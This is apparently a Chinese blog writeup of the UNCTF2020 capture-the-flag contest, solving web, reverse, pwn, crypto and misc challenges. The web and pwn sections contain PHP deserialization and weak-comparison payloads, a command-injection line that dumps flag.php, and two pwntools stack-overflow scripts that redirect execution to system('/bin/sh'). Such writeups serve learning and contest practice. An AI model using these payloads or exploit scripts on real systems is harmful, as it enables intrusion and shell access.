UNCTF2020 writeup部分题解

最新推荐文章于 2024-04-26 13:53:30 发布
最新推荐文章于 2024-04-26 13:53:30 发布
阅读量1.2k 收藏
点赞数 1
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45813388/article/details/109707695
版权

web 方向

1、EasySSRF

题目中过滤了很多协议,php遇到不认识的协议就会绕过,所以写一个www再回到根目录就能得到flag

图片

2、easyunserialize

图片

每替换一次challenge就可以逃逸出4个字符,然后password那一串反序列化有29个字符,不是4的倍数,所以删掉最后的大括号,发现依然可以运行。就ok了。

图片

payload:

?1=easychallengeeasychallengeeasychallengeeasychallengeeasychallengeeasychallengeeasychallenge";s:8:“password”;s:4:“easy”}

Ezphp

图片

弱类型比较

bool类型的true跟任意字符串可以弱类型相等。因此我们可以构造bool类型的序列化数据 ,无论比较的值是什么,结果都为true。

payload:

data=a:2:{s:8:“username”;b:1;s:8:“password”;b:1;}

Babyeval

Payload:

?a=echo%20cat%20flag.php|base64;

图片

解码就可以了

UN’s_online_tools

图片

cat被过滤了用\绕过

图片

俄罗斯方块人大战奥特曼

俄罗斯方块游戏,按f12可以找到游戏的包.wasm,下载下来用010editor打开,满屏的flag,找着找着发现一个像目录一样的字段,在网页中试一下,直接拿到flag

reverse方向

题目名称re_checkin

操作内容:

用ida反编译后

图片

发现main函数中有

图片

那么str2中存储得到底是什么呢?

这里提到sub_4015DC修改了这个Str2

Sub_4015DC是这样做的

图片

这就是flag了

题目名称easyMaze

操作内容:

用ida反编译

发现main里有这样的代码

图片

Help me out?DST?这是提示我这是一道迷宫题

图片

V3是什么东西?

当这两个函数都返回真时v3时真

那么

图片

我们先看看sub_401757

奥,这是告诉我们这个flag被包裹在UNCTF{}中

图片

那么sub_40161A呢?

图片

这说明flag时一堆方向了

图片

这个D和0时不能走的

走到S就成功了

图片

那么迷宫在哪里呢?

在DST这里

图片

说实话,乱找找到的这个地图

图片

图片

把地图做出来后就可以得到flag了

题目名称YLBNB

操作内容:

只要把网址输入进去http://45.158.33.12:8000/就可以直接拿到flag

pwn方向

题目名称fan

操作内容:

看看vul是什么

图片

Buf的位置是rbp-30

Read读了0x40

所以可以栈溢出

from pwn import *

url = remote(“ip”,port);

system_adress = 0x 0000000000400735

payload = ‘a’*(0x30+8)+p64(system_adress)

url.sendline(payload)

url.interactive()

题目名称do_you_like_me?

操作内容:

图片

Buf [rbp-10]

Read0x64

又可以栈溢出

看下可不可以找system(“\bin\sh”)

图片

Sub_4006CD使用过这个system

图片

一个大大的/bin/sh

那么就控制程序到这里去吧

from pwn import *

url = remote(“ip”,port);

system_adress = 0x 00000000004006CD

payload = ‘a’*(0x30+8)+p64(system_adress)

url.sendline(payload)

url.interactive()

crypto方向

Wing

Word里找字体照着打

图片

然后飘号和下划线的wing好容易弄混,实际应该是下划线

easy_rsa

这题就是个简单的rsa,根据a,b算出p,q用一个rsa解密脚本就可以得出来

鞍山大法官开庭之缺的营养这一块怎么补

一个简单的培根密码,直接用在线网站就可以解出来

MISC方向

https://blog.csdn.net/amherstieae/article/details/108909743

搜了一下发现有在线转换器的

baba_is_you

简单签到题,把文件拖入010,开到最后有一个网址,用浏览器打开看到评论区有flag

爷的历险记

是一个rpg游戏,必不可能硬打,直接在文件的包里找到怪物属性,改一下怪物血量,进去打一下就可以得到flag。

YLB’s CAPTCHA - 签到题

emmm,硬打出来的,有点费眼睛。。。

阴阳人编码

先搜到了一个阴阳怪气编码,但是编码规则显然不一样,然后看密文的格式很像brainfxxk,把两个字符改成ok,三个字符改成ook,反着的问号改成正着的,拖到在线网站中,直接解密得到flag

躲猫猫

这个我用了取巧的办法,直接把后缀改成了.zip,发现其中有一个文件中有一串密文,在线解密一下就有flag了

被删除的flag

直接用010打开就可以拿到flag了

图片

撕坏的二维码

二维码损坏程度不高,直接修复右上角的标识码就可以扫出结果了

mouse_click

usb的流量分析,网上可以直接找到现成的操作步骤,只要看出是用左键来画画的就可以了,最后看着模糊的图像就可以得到flag

https://www.anquanke.com/post/id/85218

https://blog.csdn.net/qq_43431158/article/details/108717829

EZ_IMAGE

也是在网上可以找到的现成拼图方法

https://blog.csdn.net/fjh1997/article/details/107585782

montage和gaps直接在linux环境下一用就出来了

倒影

在文件最后有一串base64,解密后发现最后是4030b405

根据题名,直接把字符串倒序输出是一个压缩包

爆破下6位数字密码就行,即可得到flag

YE.SS
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
攻防世界web新手区easyphp题解writeup
weixin_46906325的博客
10-03 7251
攻防世界web新手区easyphp题解
2024年[NISACTF 2024]easyssrf wp(SSRF入门),掌握这6大技能体系
最新发布
2401_84302722的博客
05-10 544
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力.恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;
CTF-Misc题记录
kensouXI的博客
11-13 517
一.baba_is_you 解题思路:下载winhex软件,分析图片隐写信息,在最后得到hex编码的信息,在线解码得flag。 解码网站:http://stool.chinaz.com/hex 二.阴阳人 解题思路:将就这和不会吧换成Ook,将倒?换成正?,在线解Ook编码,得到flag。 解码网站:https://www.splitbrain.org/services/ook 三.爷的历险记 解题思路:进入游戏玩一会存档退出,用在线工具修改存档,金钱9999999,各属性9999999,买下游戏中商
[NISACTF 2022]easyssrf wp(SSRF入门)
Leaf_initial的博客
04-11 1478
curl_init(url)函数初始化一个新的会话,返回一个cURL句柄,供curl_setopt(),curl_exec()和curl_close() 函数使用。上述测试代码中,file_get_contents() 函数将整个文件或一个url所指向的文件读入一个字符串中,并展示给用户,我们构造类似。函数,应该是防止通过file变量进行file协议读取,所以将file命令过滤掉,无所谓,我们可以直接利用file变量来进行读取文件。我们通常要利用filex协议来进行文件读取,下面是file的最简单的用法。
2024年网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
2401_84252281的博客
04-26 744
任务环境说明:服务器场景:Server1。
2020YCBCTF羊城杯官方Writeup.pdf
10-28
2020YCBCTF羊城杯官方Writeup.pdf
【CTF WriteUp】2020网鼎杯第一场部分题解
01-20
(好难啊~~~) Crypto boom 本地运行,过三关。第一关找个东西md5值等于给定值,破解一下得到en5oy;第二关解三元一次方程,得x=74, y=68, z=31;第三关解一元二次方程,找正数根x=89127561。全过得flag ...
WMCTF_2020官方WriteUp 高清PDF版
10-15
WMCTF_2020官方WriteUp.pdf WMCTF_2020官方WriteUp 高清PDF版
Codefest'2019 CTF writeup-b64_c3VuJTIwYm95.docx
11-29
Codefest'2019 CTF writeup 是一篇关于网络安全竞赛的总结,主要涉及的是在Codefest'19夺旗比赛中的几个挑战解决方案。CTF(Capture The Flag)是一种流行的安全竞赛,参赛者通过解决各种安全相关的谜题来获取“旗帜...
De1ctf 2020 -‘check in’ writeup
01-09
在CTF(Capture The Flag)竞赛中,"De1ctf 2020 - ‘check in’" 是一道挑战性的安全题目,主要涉及到多个网络安全技术的综合运用,特别是与Web应用程序安全相关的方面。该题目的核心是通过理解并利用服务器配置中...
[NISACTF 2022]
snowlyzz的博客
09-09 6095
NISACTF部分WP
[NISACTF 2022]上
qq_62046696的博客
07-26 3693
在php中变量名字是由数字字母和下划线组成的,所以不论用post还是get传入变量名的时候都将空格、+、点、[转换为下划线,但是用一个特性是可以绕过的,就是当[提前出现后,后面的点就不会再被转义了,suchas`CTF[SHOW.COM`=>`CTF_SHOW.COM`打开界面本来以为是简单的get传参,结果发现有的字符不能选中,选了好几下也不可以很蹊跷,仅仅想到了可能是代替的一些东西吧,然后csdn了一下。array1[]=1&array2[]=2本来觉得数组绕过就可以可是,发现输出了?...
UNCTF2020web方向部分题解
bmth666的博客
11-18 1657
文章目录Web方向easy_ssrfeasyflask俄罗斯方块人大战奥特曼easyunserializebabyevalezphpeasy_uploadUN's_online_toolsezfind其他的题目的一些思路:checkin-sql:easyphp: Web方向 easy_ssrf php遇到不认识的协议就会当目录处理 ?url=0://unctf.com/../../../../../../../../flag easyflask SSTI/沙盒逃逸详细总结 SSTI模板注入及绕过姿势(基
CTF刷题第一周
qq_62660611的博客
11-10 1525
第一周刷题记录
NISACTF2022公开通道
as you know, nlp is fantasitc!
03-29 3778
NISACTF2022公开通道checkinlevel_up第一层 robots.txt第二层 md5碰撞第三层 sha1碰撞第四层 parse_url解析漏洞第五层create_function()注入bingdundunbabyserializebabyuploadeasyssrfis secret(原题)popchain(原题)middlevel(原题) 题目 checkin urlencode,因为解释器读取出来的才是真正的顺序 ahahahaha=jitanglailo&&%E2%
记一次简单的PHP代码审计(SSRF案例)
weixin_30587927的博客
08-08 595
题目链接: http://oj.momomoxiaoxi.com:9090/ 用dirsearch对网址进行扫描,发现robots.txt 命令行: python3 dirsearch.py -u "http://oj.momomoxiaoxi.com:9090/" -e * 于是输入网址打开这个文件: http://oj.momomoxiaoxi.com:909...
CTF web题总结--SSRF
热门推荐
bob的博客
08-29 1万+
SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内网。(正因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内网) SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤和限制。即SSRF漏洞就是通过篡改 获取
第四届2021美团网络安全 MT-CTF writeup
qq_45603443的博客
01-11 3503
第四届2021美团网络安全 MT-CTF writeupWebUPstorageMiscUn(ix)zipReverserandomCryptohamburgerRSASymbolPwnbabyropblindboxbookshop重点来了 Web UPstorage 需要先xxe读session 找到ip,然后直接phar。 <?php abstract class Users { public $db; abstract public function verify_user($usernam
2020 YCBCTF羊城杯官方Writeup:PHP与Web安全解题技巧实录
2020YCBCTF羊城杯官方Writeup是一份详细的竞赛报告,涵盖了该年度网络安全 Capture The Flag (CTF) 比赛中的一系列挑战,主要集中在Web、PHP、漏洞利用、密码学、以及逆向工程等不同领域。以下是各个部分的主要知识...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值